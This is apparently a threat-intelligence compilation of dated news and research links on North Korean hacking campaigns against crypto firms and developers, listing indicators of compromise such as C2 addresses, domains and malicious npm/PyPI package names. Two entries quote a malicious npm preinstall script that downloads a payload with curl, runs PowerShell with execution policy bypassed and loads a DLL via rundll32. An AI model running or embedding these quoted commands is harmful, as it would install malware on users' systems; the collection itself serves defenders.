Three weeks prior to this call, a Telegram user “Chao Deng” “@/chaodeng” claiming to be from the known fund Hashkey signaled interested in investing in Showtime. I somehow remembered that fund name and thought nothing more of it. Long story short, that impersonator refused to join my Google Meet and proposed me to chat via a VPN-friendly “alternative” video link, which contained a script that I ran, like an idiot, in an effort to not be late. Indicators::

New Trojan attacking macOS users

Date:: 2023-12-05 URL:: https://securelist.com/bluenoroff-new-macos-malware/111290/ Tags:: SquidSquad, RustBucket Details::

We recently discovered a new variety of malicious loader that targets macOS, presumably linked to the BlueNoroff APT gang and its ongoing campaign known as RustBucket.
Earlier RustBucket versions spread its malicious payload via an app disguised as a PDF viewer. By contrast, this new variety was found inside a ZIP archive that contained a PDF file named, Crypto-assets and their risks for financial stability, with a thumbnail that showed a corresponding title page. The metadata preserved inside the ZIP archive suggests the app was created on October 21, 2023.
Written in Swift and named EdoneViewer, the executable is a universal format file that contains versions for both Intel and Apple Silicon chips. Decryption of the XOR-encrypted payload is handled by the main function, CalculateExtameGCD. While the decryption process is running, the app puts out unrelated messages to the terminal to try and lull the analyst’s vigilance. Indicators::

Analysis of Suspected Lazarus (APT-Q-1) Attack Sample Targeting npm Package Supply Chain

Date:: 2023-12-08 URL:: https://ti.qianxin.com/blog/articles/Analysis-of-Suspected-Lazarus-APT-Q-1-Attack-Sample-Targeting-npm-Package-Supply-Chain-EN/ Tags:: Details::

Jade Sleet, Comebacker DLL Indicators::
103.179.142.171/files/npm.mov
103.179.142.171/npm/npm.mov
156.236.76.9/faq/faq.asp
156.236.76.9:80
91.206.178.125/files/npm.mov
91.206.178.125/upload/upload.asp
91.206.178.125:80
blockchain-newtech.com
blockchain-newtech.com/download/download.asp
chaingrown.com
chaingrown.com/manage/manage.asp
preinstall.db
sql.tmp
103.179.142.171
156.236.76.9

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

Date:: 2023-12-10 URL:: https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/ Tags:: Details::

HazyLoad NineRAT BottomLoader DLRAT Indicators::

Koda's recent DPRK IoCs

Date:: 2023-12-11 URL:: https://github.com/0xKoda/ioc-public/blob/main/ioc.json Tags:: Details:: Indicators::

Fake Developer Jobs Laced With Malware

Date:: 2023-12-20 URL:: https://blog.phylum.io/smuggling-malware-in-test-code/ Tags:: Details::

npm package trying to masquerade as code profiler which actually installs several malicious scripts including a cryptocurrency and credential stealer
Attempted to hide the malicious code in a test file, presumably thinking that no one would bother to look for malware in test code. Indicators::

Obfuscated code a recruiter sent me

Date:: 2023-12-21 URL:: https://reddit.com/r/hacking/comments/18npzcl/comment/kecsptt/ https://x.com/unpacker/status/1737993034934169855 Tags:: DPRK-CI Details::

There are Extension ID's hardcoded in there that are related to crypto wallets and the JavaScript attempts to decrypt/collect that data and send it off to the server of IP 147.124.212.89:1244 using different endpoints Indicators::
github[.]com/SolmateD/Solmate-presale-backend/blob/9161e3ca130d1d958fd26c33191161db524c0039/src/services/routes.js#L1
pastebin.com/LnTRXgnM
text.is/JOPY

To stem North Korea’s missiles program, White House looks to its hackers

Date:: 2023-12-22 URL:: https://politico.com/news/2023/12/21/north-korea-missiles-program-hackers-00132871 Tags:: Details::

Hacking, she argued, has enabled North Korea to “either evade sanctions or evade the steps the international community has taken to target their weapons proliferation … their missile regime, and the growth in the number of launches we’ve seen.”
Poor regulation and shoddy security in the fast-growing cryptocurrency industry, which is dominated by start-ups, make it an easy target for Pyongyang’s hackers. Because of crypto’s inbuilt privacy features and the fact that it can be sent across borders at the click of a mousepad, it also offers a powerful tool to circumvent sanctions. Indicators::

Hackers Deploying AppleSeed, Meterpreter, and TinyNuke in Latest Attacks

Date:: 2023-12-23 URL:: https://thehackernews.com/2023/12/kimsuky-hackers-deploying-appleseed.html Tags:: Kimsuky Details::

Nation-state actors affiliated to North Korea have been observed using spear-phishing attacks to deliver an assortment of backdoors and tools such as AppleSeed, Meterpreter, and TinyNuke to seize control of compromised machines. Indicators::

Blockchain dev's wallet emptied in job interview using npm package

Date:: 2023-12-28 URL:: https://bleepingcomputer.com/news/security/blockchain-devs-wallet-emptied-in-job-interview-using-npm-package/ https://x.com/muratctp/status/1739224777955369420 Tags:: DPRK-CI Details::

The Upwork job posting asks the applicant to fix bugs and resopnsiveness [sic] on website and claims to pay between $15 and $20 hourly for a task expected to take under a month. Indicators::
npm:: web3_nextjs
npm:: web3_nextjs_backend

2024

Update to November’s Crypto-Themed npm Attack

Date:: 2024-01-05 URL:: https://blog.phylum.io/update-to-novembers-crypto-themed-npm-attack/ Tags:: Details::

Since that initial report, we have identified nearly two dozen additional packages belonging to this still active campaign. Additionally, the QiAnXin Threat Intelligence Center released a detailed analysis of the binary involved in this campaign, conclusively linking it to a North Korean APT. With this revelation, and given that the package names were crypto-themed, it becomes increasingly apparent that the campaign’s ultimate objective was likely twofold: first, to gain persistent access to the systems of developers who installed these packages, and second, to leverage this access to infiltrate the broader organization these developers belong to—likely entities within the cryptocurrency sector. Presumably the end goal, given the recent history of North Korean hacking objectives, was to steal substantial cryptocurrency assets, thereby circumventing the heavy sanctions imposed upon them—more on that later. Indicators::
config-storages, web3-core-subscription, port-common, styled-beautify-components, bitcore-transactions, feather-icons-pro, port-launcher, blockchain-transactions, blockchain-contracts, chainflowpro, chainflow, cryptotransact, blockledger, erc20-testenv, puma-com, simplecointest, coincryptotest, blockchaintestenv, cryptotestenv, envision-config, envi-conf, envi-config, config-envi, dot-environment

Comprehensive Report on North Korean Hackers, Phishing Groups, and Money Laundering in 2023

Date:: 2024-01-11 URL:: https://slowmist.medium.com/comprehensive-report-on-north-korean-hackers-phishing-groups-and-money-laundering-in-2023-f3ec135ed837 Tags:: Money Laundering Details::

Based on publicly available information from 2023, as of June, there have been no significant cryptocurrency thefts attributed to the North Korean hacker group, Lazarus Group. Analysis of blockchain activity suggests that the Lazarus Group has primarily been engaged in laundering cryptocurrency funds stolen in 2022. This includes approximately $100 million lost in the June 23, 2022 attack on the Harmony cross-chain bridge.
However, subsequent developments revealed that the Lazarus Group was not only laundering stolen cryptocurrency funds. They were also actively involved in Advanced Persistent Threat (APT) attacks during their operational downtime. These covert activities precipitated the ‘Dark 101 Days’ in the cryptocurrency industry, starting from June 3. Indicators::

Funds Stolen from Crypto Platforms Fall More Than 50% in 2023, but Hacking Remains a Significant Threat as Number of Incidents Rises

Date:: 2024-01-24 URL:: https://chainalysis.com/blog/crypto-hacking-stolen-funds-2024/ Tags:: Money Laundering Details::

Over the last few years, cryptocurrency hacking has become a pervasive and formidable threat, leading to billions of dollars stolen from crypto platforms and exposing vulnerabilities across the ecosystem. As we revealed in last year’s Crypto Crime Report, 2022 was the biggest year ever for crypto theft with $3.7 billion stolen. In 2023, however, funds stolen decreased by approximately 54.3% to $1.7 billion, though the number of individual hacking incidents actually grew, from 219 in 2022 to 231 in 2023.
Indicators::

North Korea Threat Landscape Update

Date:: 2024-01-24 URL:: https://thecyberwire.com/podcasts/microsoft-threat-intelligence/10/notes Tags:: Details::

The evolution of North Korean cyber operations
How cryptocurrency theft is used as a means to support the state
North Korea's unique approach to cyber operations and strategic evolution over time Indicators::

CVE-2024-21338 North Korea’s Lazarus deploys rootkit via AppLocker zero-day flaw

Date:: 2024-02-24 URL:: https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/ https://csoonline.com/article/1311082/north-koreas-lazarus-deploys-rootkit-via-applocker-zero-day-flaw.html Tags:: CVE Details::

CVE-2024-21338, BYOVD, FudModule
The vulnerability was introduced in Win10 1703 (RS2/15063) when the 0x22A018 IOCTL handler was first implemented. Older builds are not affected as they lack support for the vulnerable IOCTL. Interestingly, the Lazarus exploit bails out if it encounters a build older than Win10 1809 (RS5/17763), completely disregarding three perfectly vulnerable Windows versions. Indicators::

New Malicious PyPI Packages used by Lazarus

Date:: 2024-02-28 URL:: https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html Tags:: Details::

JPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI.
This type of malware, called Comebacker, is the same type as that used by Lazarus to target security researchers in an attack reported by Google [1] in January 2021. The following sections describe the details of test.py.
In addition, the NOP code used in this sample has a unique characteristic. As shown in Figure 6, there is a command starting with 66 66 66 66 in the middle of the code. This is often used, especially in the decode and encode functions. This characteristic is also found in other types of malware used by Lazarus, including malware BLINDINGCAN.
After test.py is XOR-decoded, it is saved as output.py and then executed as a DLL file: Indicators::
$ rundll32 output.py,CalculateSum
pycryptoenv
pycryptoconf
quasarlib
swapmempool
blockchain-newtech.com/download/download.asp
fasttet.com/user/agency.asp
chaingrown.com/manage/manage.asp
91.206.178.125/upload/upload.asp

Phishing by Appointment: Suspected North Korean Hackers Target Blockchain Community Via Telegram

Date:: 2024-02-28 URL:: https://hunt.io/blog/suspected-north-korean-hackers-target-blockchain-community-via-telegram Tags:: SquidSquad Details::

Hunt is tracking an ongoing sophisticated phishing campaign targeting individuals in the Telegram groups focused on the blockchain and angel investing communities, specifically entrepreneurs. The tactics described below are strikingly similar to those previously attributed to the Lazarus Group, a North Korean state-sponsored threat actor. Communication begins with the actor posing as a representative of an investment company seeking business opportunities. As the conversation progresses, the victim is asked to download an Apple Script after 'technical difficulties' are encountered in setting up a meeting. Indicators::
IP_Request.scpt
104.168.163[.]149
support.internal-meeting[.]site
104[.]168[.]163[.]124
www.group-meeting[.]xyz
23[.]254[.]129[.]6
you.alwayswait[.]online
104[.]168[.]137[.]21
meet.cryptowave[.]capital

UN Security Council Report

Date:: 2024-03-07 URL:: https://securitycouncilreport.org/atf/cf/%7B65BFCF9B-6D27-4E9C-8CD3-CF6E4FF96FF9%7D/S%202024%20215.pdf Tags:: Kimsuky Details::

According to a cybersecurity company, the IP address of the Kimsuky server hosting this malware is 144.76.109.61 and the IP address of another, related server hosting the Kimsuky-controlled domain civilarys.store is 27.255.81.77.
Kimsuky-related email accounts associated with this campaign include luckgpu[@]gmail.com and abdulsamee7561[@]gmail.com.
The malicious applications were likely distributed via spearphishing or smishing. Indicators::
144.76.109.61
27.255.81.77
luckgpu[@]gmail.com
abdulsamee7561[@]gmail.com

The Lazarus group appears to be currently reaching out to targets via LinkedIn and spreading malware

Date:: 2024-04-20 URL:: https://x.com/malwrhunterteam/status/1781619431728123981 https://x.com/dimitribest/status/1782609281897902426 https://infosec.exchange/@spark/111621395392313256 https://x.com/BaoshengbinCumt/status/1783402882903277983 https://stackoverflow.com/questions/78328188/scam-js-code-does-this-script-install-anything-malicious-locally-if-i-ran-it-wi https://pastebin.com/2pz1iQFm https://x.com/asdasd13asbz/status/1782951380568936481 https://x.com/im23pds/status/1782984061369405878 Tags:: DPRK-CI Details:: InvisibleFerret, BeaverTail Indicators:: 147.124.212.89:1244 test_interview.zip

US DOJ: Disrupt Illicit Revenue Generation Efforts of Democratic People’s Republic of Korea Information Technology Workers

Date:: 2024-04-29 URL:: https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-action-disrupt-illicit-revenue-generation https://x.com/tayvano_/status/1777911893224808911 https://x.com/tayvano_/status/1777911896508887178 https://x.com/tayvano_/status/1777911898845159775 Tags:: DPRK-IT, Money Laundering Details::

On Oct. 17, pursuant to a court order issued in the Eastern District of Missouri, the United States seized 17 website domains used by Democratic People’s Republic of Korea (DPRK) information technology (IT) workers in a scheme to defraud U.S. and foreign businesses, evade sanctions and fund the development of the DPRK government’s weapons program. These seizures follow the previously sealed October 2022 and January 2023 court-authorized seizures of approximately $1.5 million of the revenue that the same group of IT workers collected from unwitting victims as a result of their scheme, as well as the development of public-private information-sharing partnerships that denied the IT workers access to their preferred online freelance work and payment service providers. Indicators::

How Lazarus Group laundered $200M from 25+ crypto hacks to fiat from 2020–2023

Date:: 2024-04-29 URL:: https://zachxbt.mirror.xyz/B0-UJtxN41cJhpPtKv0v2LZ8u-0PwZ4ecMPEdX4l8vE Tags:: SquidSquad, Money Laundering Details::

CoinBerry, Unibright, CoinMetro, Nexus Mutual, EasyFi, Bondly, Unreported hacks, MGNR, PolyPlay, bZx, Steadefi, CoinShift, Paxful and Noones accounts Indicators::

Recruitment trap for blockchain practitioners: Analysis of suspected Lazarus (APT-Q-1) stealing operations

Date:: 2024-05-10 URL:: https://mp.weixin.qq.com/s/84lUaNSGo4lhQlpnCVUHfQ Tags:: DPRK-CI Details::

Contagious Interview, BeaverTail, InvisibleFerret
Attackers create false identities on work platforms (such as LinkedIn, Upwork, Braintrust, etc.), disguised as employers, independent developers or startup founders, and publish job information with lucrative rewards or urgent tasks. The work content is usually software development or problem fixing. Indicators::
Github:: plannet-plannet
Github:: bmstoreJ
Github:: CodePapaya
Github:: Allgoritex
Github:: bohinskamariia
Github:: danil33110
Github:: aluxiontemp
Github:: komeq1120
Github:: aufeine Account active since 2024-04-15
Github:: dhayaprabhu Account active since 2019. Malicious code base (dhayaprabhu/Crypto-Node.js) was first committed on 2024-02-01
Github:: MatheeshaMe Account active since 2021. Malicious code repository (MatheeshaMe/etczunks-marketplace) submitted on 2023-10-11
Github:: Satyam-G5 Account active since 2023. Malicious code repository (Satyam-G5/etczunks-marketplace) was forked from MatheeshaMe/etczunks-marketplace on 2023-10-12
Github:: emadmohd211 Account active since 2021
Github:: alifarabi Account active since 2020. Malicious code repository (alifarabi/organ-management) was first submitted on 2024-03-30
Bitbucket:: juandsuareza
Bitbucket:: freebling
172.86.97.80:1224
172.86.123.35:1244
147.124.212.89:1244
147.124.212.146:1244
147.124.213.11:1244
147.124.213.29:1244
147.124.214.129:1244
147.124.214.131:1244
147.124.214.237:1244
67.203.7.171:1244
67.203.7.245:1244
91.92.120.135:3000
45.61.131.218:1245
173.211.106.101:1245
Python Trojan, with C2 at 45.61.131.218:1245
Download a Python script for deploying AnyDesk from the URL /adc/ of the first-stage C2 server (147.124.214.237:1244)

US court orders forfeiture of 279 crypto accounts tied to North Korea laundering

Date:: 2024-05-10 URL:: https://nknews.org/2024/05/us-court-orders-forfeiture-of-279-crypto-accounts-tied-to-north-korea-laundering/ Tags:: Money Laundering Details::

A U.S. court has ordered the forfeiture of nearly 300 cryptocurrency accounts linked to North Korea’s laundering of millions of dollars in stolen assets, underscoring Washington's increasing efforts to crack down on illicit cyber activities funding Pyongyang’s nuclear ambitions. Indicators::

Exclusive: North Korea laundered $147.5 mln in stolen crypto in March, say UN experts

Date:: 2024-05-14 URL:: https://reuters.com/technology/cybersecurity/north-korea-laundered-1475-mln-stolen-crypto-march-say-un-experts-2024-05-14/ Tags:: Money Laundering Details::

North Korea laundered $147.5 million through virtual currency platform Tornado Cash in March after stealing it last year from a cryptocurrency exchange, according to confidential work by United Nations sanctions monitors seen by Reuters on Tuesday. Indicators::

Thousands of North Koreans stole Americans’ identities and took remote-work tech jobs at Fortune 500 companies, DOJ says

Date:: 2024-05-16 URL:: https://justice.gov/usao-dc/pr/charges-and-seizures-brought-fraud-scheme-aimed-denying-revenue-workers-associated-north https://archive.ph/nWug9 Tags:: DPRK-IT Details::

As alleged in the court documents, DPRK has dispatched thousands of skilled IT workers around the world, who used stolen or borrowed U.S. persons’ identities to pose as domestic workers, infiltrate domestic companies’ networks, and raise revenue for North Korea. The schemes described in court documents involved defrauding over 300 U.S. companies using U.S. payment platforms and online job site accounts, proxy computers located in the United States, and witting and unwitting U.S. persons and entities. This announcement includes the largest case ever charged by the Justice Department involving this type of IT workers’ scheme. Indicators::

Microsoft: Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks

Date:: 2024-05-28 URL:: https://microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/ https://advantage.mandiant.com/reports/22-00021780 Tags:: DPRK-IT Details::

formerly Storm-1789
Moonstone Sleet is observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a fully functional malicious game, and deliver a new custom ransomware.
While Moonstone Sleet initially had overlaps with Diamond Sleet, the threat actor has since shifted to its own infrastructure and attacks, establishing itself as a distinct, well-resourced North Korean threat actor.
Moonstone Sleet is a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned and uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies. When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks. Subsequently, Microsoft has observed Moonstone Sleet and Diamond Sleet conducting concurrent operations, with Diamond Sleet still utilizing much of its known, established tradecraft.
Moonstone Sleet has an expansive set of operations supporting its financial and cyberespionage objectives. These range from deploying custom ransomware to creating a malicious game, setting up fake companies, and using IT workers.
In early August 2023, Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY, an open-source terminal emulator, via apps like LinkedIn and Telegram as well as developer freelancing platforms. Often, the actor sent targets a .zip archive containing two files: a trojanized version of putty.exe and url.txt, which contained an IP address and a password. If the provided IP and password were entered by the user into the PuTTY application, the application would decrypt an embedded payload, then load and execute it. Notably, before Moonstone Sleet used this initial access vector, Microsoft observed Diamond Sleet using a similar method – trojanized PuTTY and SumatraPDF — with comparable techniques for anti-analysis, as we reported in 2022
Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using a malicious tank game it developed called DeTankWar (also called DeFiTankWar, DeTankZone, or TankWarsZone). DeTankWar is a fully functional downloadable game that requires player registration, including username/password and invite code. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms or by email, presenting itself as a game developer seeking investment or developer support and either masquerading as a legitimate blockchain company or using fake companies. To bolster the game’s superficial legitimacy, Moonstone Sleet has also created a robust public campaign that includes the websites detankwar.com and defitankzone.com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself.
Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the game included in the body of the message. More details about C.C. Waterfall and another fake company that Moonstone Sleet set up to trick targets are included below:
Since January 2024, Microsoft has observed Moonstone Sleet creating several fake companies impersonating software development and IT services, typically relating to blockchain and AI. The actor has used these companies to reach out to potential targets, using a combination of created websites and social media accounts to add legitimacy to their campaigns.
From January to April 2024, Moonstone Sleet’s fake company StarGlow Ventures posed as a legitimate software development company. The group used a custom domain, fake employee personas, and social media accounts, in an email campaign targeting thousands of organizations in the education and software development sectors. In the emails Moonstone Sleet sent as part of this campaign, the actor complimented the work of the targeted organization and offered collaboration and support for upcoming projects, citing expertise in the development of web apps, mobile apps, blockchain, and AI. Indicators::
bestonlinefilmstudio.org
blockchain-newtech.com
ccwaterfall.com
chaingrown.com
defitankzone.com
detankwar.com
freenet-zhilly.org
matrixane.com
pointdnt.com
starglowventures.com
mingeloem.com

From Opportunity to Threat: My Encounter with a Blockchain Job Scam

Date:: 2024-05-29 URL:: https://medium.com/@mahitman1/from-opportunity-to-threat-my-encounter-with-a-blockchain-job-scam-9e0457754298 Tags:: DPRK-CI Details::

Here’s an excerpt from the hiring form: “Provide estimation. After running the existing Node.js backend, you will get an API-website on port 5000. Through this API-website, check all the functions [including function name & params] of the smart contract you will develop. Indicators::
git clone github.com/Sudi857/reward_backend.git

UNC4899 Insights on Cyber Threats Targeting Users and Enterprises in Brazil

Date:: 2024-06-12 URL:: https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil https://support.google.com/a/answer/9007870?hl=en Tags:: DPRK-IT Details::

North Korean Government-Backed Groups Targeting Brazil
Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil.
North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors.
Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.
In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware.
To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm.
If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test.
The instructions directed users to download and run a project hosted on GitHub.
The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.
North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry.
In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm.
In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities.
Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++.
The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp.
The campaigns were consistent with Operation DreamJob and activity previously [described by Google.
In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.
One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern.
In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit a fake PDF viewer that presents the users with a login prompt to enter their credentials in order to view the lure document.
In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.
One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles.
Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem. Indicators::

New Tactics from a Familiar Threat

Date:: 2024-07-08 URL:: https://blog.phylum.io/new-tactics-from-a-familiar-threat/ Tags:: Details::

https://otx.alienvault.com/indicator/domain/cryptocopedia.com
It contained all the functional code and tests from call-bind but with a modified package.json file and five additional files: shim.js, polyfill.js, implementation.js, callTo.js, and mod.json
'@echo off\ncurl -o funData.ctr -L https://cryptocopedia.com/explorer/search.asp?token=5032 > nul 2>&1\nstart /b /wait powershell.exe -ExecutionPolicy Bypass -File towr.ps1 > nul 2>&1\ndel towr.ps1 > nul 2>&1\nif exist stringh.dat (\ndel stringh.dat > nul 2>&1\n)\nrename colfunc.csv stringh.dat > nul 2>&1\nif exist stringh.dat (\nrundll32 stringh.dat, SetExpVal tiend\n)\nif exist mod.json (\ndel package.json > nul 2>&1\nrename mod.json package.json > nul 2>&1\n)\nping 127.0.0.1 -n 2 > nul\nif exist stringh.dat (\ndel stringh.dat > nul 2>&1\n)';
The third part replaces the original package.json with the contents of mod.json to remove the preinstall script Indicators::
call-bind
call-blockflow
react-tooltip-modal

Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry...

Date:: 2024-07-08 URL:: https://twitter-thread.com/t/1810455262320570416 Tags:: Details::

Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry.
They rekt more people, companies, protocols than anyone else.
But it's good to know exactly how they get in. Bc another smart contract audit won't save you. Indicators::

Decipher: New Version of BeaverTail macOS Malware Identified

Date:: 2024-07-15 URL:: https://duo.com/decipher/new-version-of-beavertail-macos-malware-identified Tags:: DPRK-CI Details::

Researchers have identified a new tool that ttackers affiliated with the North Korean government have developed that is designed to look like a legitimate browser-based video call application and can be used to exfiltrate information from infected machines.
MiroTalk is a free video call service that is browser-based and does not require an app download. Indicators::

Patrick Wardle: This Meeting Should Have Been an Email (BeaverTail)

Date:: 2024-07-15 URL:: https://objective-see.org/blog/blog_0x7A.html Tags:: DPRK-CI Details::

BeaverTail.zip (Password: infect3d)
InvisibleFerret (Password: infect3d)
BeaverTail, Contagious Interview Indicators::

DPRK threat actors distributing BeaverTail

Date:: 2024-07-19 URL:: https://x.com/1ZRR4H/status/1814476691911090466 Tags:: DPRK-CI Details:: Fake job offers used in this campaign 🇰🇵 and published on multiple web portals: [LinkedIn]: Senior blockchain developer needed → https://linkedin[.]com/jobs/view/senior-blockchain-developer-needed-at-hirog-3974975235/. [WellFound]: Ecommerce Developer with Web3 Integration (3+ years exp) → https://wellfound[.]com/jobs/3055218-ecommerce-developer-with-web3-integration. [PeoplePerHour]: I need senior blockchain developer for our online store → https://peopleperhour[.]com/freelance-jobs/technology-programming/e-commerce-cms-development/i-need-senior-blockchain-developer-for-our-online-store-4235812. [ZipRecruiter]: Blockchain developer needed → https://ziprecruiter[.]com/c/HiroG/Job/Blockchain-developer-needed/-in-Califon,NJ?jid=6bf13a7b9c0139d4. [WayUp]: Blockchain developer needed → https://wayup[.]com/i-j-HiroG-313478541129579/. [Recruiter]: Link is no longer avaible. Indicators:: onlinestoreforhirog[.]zip files[.]hirog[.]io/onlinestoreforhirog[.]zip

KnowBe4: How a North Korean Fake IT Worker Tried to Infiltrate Us

Date:: 2024-07-24 URL:: https://blog.knowbe4.com/how-a-north-korean-fake-it-worker-tried-to-infiltrate-us Tags:: DPRK-IT Details::

KnowBe4 needed a software engineer for our internal IT AI team. We posted the job, received resumes, conducted interviews, performed background checks, verified references, and hired the person. We sent them their Mac workstation, and the moment it was received, it immediately started to load malware. Indicators::

North Korean State Actors Exploit Open Source Supply Chain via Malicious npm Package

Date:: 2024-07-24 URL:: https://stacklok.com/blog/north-korean-state-actors-exploit-open-source-supply-chain-via-malicious-npm-package Tags:: Details::

node <script>.js && del <script>.js
@echo off\ncurl -o though.crt -L https://166.88.61.72/explorer/search.asp?token=3092 > nul 2>&1\nstart /b /wait powershell.exe -ExecutionPolicy Bypass -File yui.ps1 > nul 2>&1\ndel yui.ps1 > nul 2>&1\nif exist soss.dat (\ndel soss.dat > nul 2>&1\n)\nrename tmpdata.db soss.dat > nul 2>&1\nif exist soss.dat (\nrundll32 soss.dat, SetExpVal tiend\n)\nif exist mod.json (\ndel package.json > nul 2>&1\nrename mod.json package.json > nul 2>&1\n)\nping 127.0.0.1 -n 2 > nul\nif exist soss.dat (\ndel soss.dat > nul 2>&1\n) Indicators::
next-react-notify
call-bind
tocall.js
next-react-notify-1.0.0.tgz
github.com/StacklokLabs/jail/tree/main/npm/next-react-notify
166.88.61[.]72
Second-stage DLL soss.dat

APT45: North Korea’s Digital Military Machine

Date:: 2024-07-25 URL:: https://cloud.google.com/blog/topics/threat-intelligence/apt45-north-korea-digital-military-machine Tags:: APT45 Details::

APT45 is a long-running, moderately sophisticated North Korean cyber operator that has carried out espionage campaigns as early as 2009.
APT45 has gradually expanded into financially-motivated operations, and the group’s suspected development and deployment of ransomware sets it apart from other North Korean operators.
APT45 and activity clusters suspected of being linked to the group are strongly associated with a distinct genealogy of malware families separate from peer North Korean operators like TEMP.Hermit and APT43.
Among the groups assessed to operate from the Democratic People's Republic of Korea (DPRK), APT45 has been the most frequently observed targeting critical infrastructure. Indicators::

U.S. DOJ: North Korean Government Hacker Charged for Involvement in Ransomware Attacks Targeting U.S. Hospitals and Health Care Providers (Andariel)

Date:: 2024-07-25 URL:: https://justice.gov/opa/pr/north-korean-government-hacker-charged-involvement-ransomware-attacks-targeting-us-hospitals Tags:: Andariel Details::

Hacking Group Known as Andariel Used Ransom Proceeds to Fund Theft of Sensitive Information from Defense and Technology Organizations Worldwide, Including U.S. Government Agencies Indicators::

A Year-Long Campaign of North Korean Actors Targeting Developers via Malicious npm Packages

Date:: 2024-08-07 URL:: https://zero.checkmarx.com/a-year-long-campaign-of-north-korean-actors-targeting-developers-via-malicious-npm-packages-dbf7a6761361 Tags:: Details::

July 2024 saw a surge in reports from multiple security firms detailing North Korean threat actors targeting developers through malicious npm packages. These reports highlight the continuation and intensification of a campaign that has been ongoing for close to a year now. While the core structure of the malicious code has remained remarkably similar throughout the campaign, the threat actors have been consistently evolving their social engineering tactics to increase their chances of compromising target systems. Indicators::
call-blockflow
yuriwil32 yuriwilliam32@outlook.com
harthat-api
harthat-chain
ogremagikenedy68@outlook.com
harthat-cookie
ogremagikenedy68@outlook.com
harthat-hash
nagasirenwilliam978@outlook.com
next-react-notify
johnmurphy928@outlook.com
cryptocopedia.com/explorer/search.asp?token=5032
142.111.77.196/user/user.asp?id=237596
142.111.77.196/user/user.asp?id=G6A822B
142.111.77.196/manage/manage.asp?id=745681
142.111.77.196/user/user.asp?id=518437
142.111.77.196

Malicious npm Packages

Date:: 2024-08-29 URL:: https://blog.phylum.io/north-korea-still-attacking-developers-via-npm/ https://thehackernews.com/2024/08/north-korean-hackers-target-developers.html Tags:: DPRK-CI Details::

In the past few weeks, we've observed a renewed surge of activity from groups aligned with North Korean objectives, publishing several packages to npm. This latest wave appears to involve multiple groups or at least exhibits several distinct publication patterns, TTPs (Tactics, Techniques, and Procedures), and attack types we've seen in the past. The renewed surge began on August 12, 2024, with the publication of temp-etherscan-api and two versions of ethersscan-api. Approximately a week and a half later, telegram-con and another version of ethersscan-api were published. These packages appear to contain similar malware, including qq-console, published two weeks later on August 27. Behaviors in this campaign lead us to believe that qq-console is attributable to the North Korean campaign known as Contagious Interview. Indicators::
167.88.36.13 Hostinger Boston, MA
45.61.158.14 RouterHosting Dallas, TX Remote Desktop
95.164.17.24 STARK INDUSTRIES Meppel, NL
ethersscan-api
helmet-validate
ipcheck.cloud
mirotalk.net
nicholasmagill9203@hotmail.com
qq-console
richard96mars@gmail.com
sass-notification
telegram-con
temp-etherscan-api

CVE-2024-7971: North Korean threat actor Citrine Sleet exploiting Chromium zero-day

